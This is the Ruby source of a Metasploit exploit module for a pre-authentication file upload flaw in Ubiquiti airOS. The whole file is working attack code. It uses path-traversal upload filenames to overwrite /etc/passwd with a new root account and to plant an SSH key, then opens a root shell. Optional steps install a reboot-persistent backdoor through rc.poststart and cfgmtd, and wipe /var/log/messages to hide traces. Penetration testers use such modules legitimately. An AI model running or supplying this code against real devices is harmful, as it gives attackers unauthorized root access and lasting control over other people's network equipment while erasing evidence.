This Metasploit module exploits a pre-auth file upload to install a new root user to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys. FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten. /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true. This method is used by the "mf" malware infecting these devices.
bb35dd847b4006bfddf6670aa0099dfa601022d89cda1ae234b032fd32276366
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
# See note about overwritten files
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ubiquiti airOS Arbitrary File Upload',
'Description' => %q{
This module exploits a pre-auth file upload to install a new root user
to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys.
FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten.
/etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true.
This method is used by the "mf" malware infecting these devices.
},
'Author' => [
'93c08539', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
%w{EDB 39701},
%w{URL https://hackerone.com/reports/73480}
],
'DisclosureDate' => 'Feb 13 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Targets' => [
['Ubiquiti airOS < 5.6.2', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => true
}
))
register_options([
Opt::RPORT(443),
OptPort.new('SSH_PORT', [true, 'SSH port', 22])
])
register_advanced_options([
OptBool.new('PERSIST_ETC', [false, 'Persist in /etc/persistent', false]),
OptBool.new('WIPE_LOGS', [false, 'Wipe /var/log/messages', false]),
OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),
OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
])
end
def exploit
print_status('Uploading /etc/passwd')
upload_etc_passwd
print_status('Uploading /etc/dropbear/authorized_keys')
upload_authorized_keys
print_status("Logging in as #{username}")
vprint_status("Password: #{password}")
vprint_status("Private key:\n#{private_key}")
if (ssh = ssh_login)
print_good("Logged in as #{username}")
handler(ssh.lsock)
end
end
def on_new_session(session)
super
if datastore['PERSIST_ETC']
print_status('Persisting in /etc/persistent')
persist_etc(session)
end
if datastore['WIPE_LOGS']
print_status('Wiping /var/log/messages')
wipe_logs(session)
end
end
def upload_etc_passwd
mime = Rex::MIME::Message.new
mime.add_part(etc_passwd, 'text/plain', 'binary',
'form-data; name="passwd"; filename="../../etc/passwd"')
send_request_cgi(
'method' => 'POST',
'uri' => '/login.cgi',
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
end
def upload_authorized_keys
mime = Rex::MIME::Message.new
mime.add_part(authorized_keys, 'text/plain', 'binary',
'form-data; name="authorized_keys"; ' \
'filename="../../etc/dropbear/authorized_keys"')
send_request_cgi(
'method' => 'POST',
'uri' => '/login.cgi',
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
end
def ssh_login
ssh_opts = {
port: datastore['SSH_PORT'],
auth_methods: %w{publickey password},
key_data: [private_key],
# Framework options
msframework: framework,
msfmodule: self,
proxies: datastore['Proxies']
}
ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
begin
ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(rhost, username, ssh_opts)
end
rescue Net::SSH::Exception => e
vprint_error("#{e.class}: #{e.message}")
return nil
end
if ssh
report_vuln(
host: rhost,
name: self.name,
refs: self.references,
info: ssh.transport.server_version.version
)
report_note(
host: rhost,
port: datastore['SSH_PORT'],
type: 'airos.ssh.key',
data: private_key
)
return Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
end
nil
end
#
# Persistence and cleanup methods
#
def persist_etc(session)
mime = Rex::MIME::Message.new
mime.add_part(rc_poststart, 'text/plain', 'binary',
'form-data; name="rc.poststart"; ' \
'filename="../../etc/persistent/rc.poststart"')
send_request_cgi(
'method' => 'POST',
'uri' => '/login.cgi',
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'data' => mime.to_s
)
# https://www.hwmn.org/w/Ubiquity_HOWTO
commands = [
"mkdir #{username}",
"cp /etc/passwd /etc/dropbear/authorized_keys #{username}",
'cfgmtd -wp /etc'
]
commands.each do |command|
session.shell_command_token(command)
end
end
def wipe_logs(session)
session.shell_command_token('> /var/log/messages')
end
#
# /etc/passwd methods
#
def etc_passwd
"#{username}:#{hash(password)}:0:0:Administrator:/etc/persistent:/bin/sh\n"
end
def hash(password)
# https://man7.org/linux/man-pages/man3/crypt.3.html
salt = Rex::Text.rand_text(2, '', Rex::Text::AlphaNumeric + './')
password.crypt(salt)
end
def username
@username ||= Rex::Text.rand_text_alpha_lower(8)
end
def password
@password ||= Rex::Text.rand_text_alphanumeric(8)
end
#
# /etc/dropbear/authorized_keys methods
#
def authorized_keys
pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
"#{ssh_keygen.ssh_type} #{pubkey}\n"
end
def private_key
ssh_keygen.to_pem
end
def ssh_keygen
@ssh_keygen ||= OpenSSL::PKey::RSA.new(2048)
end
#
# /etc/persistent/rc.poststart methods
#
def rc_poststart
<<EOF
cp /etc/persistent/#{username}/passwd /etc/passwd
cp /etc/persistent/#{username}/authorized_keys /etc/dropbear/authorized_keys
EOF
end
end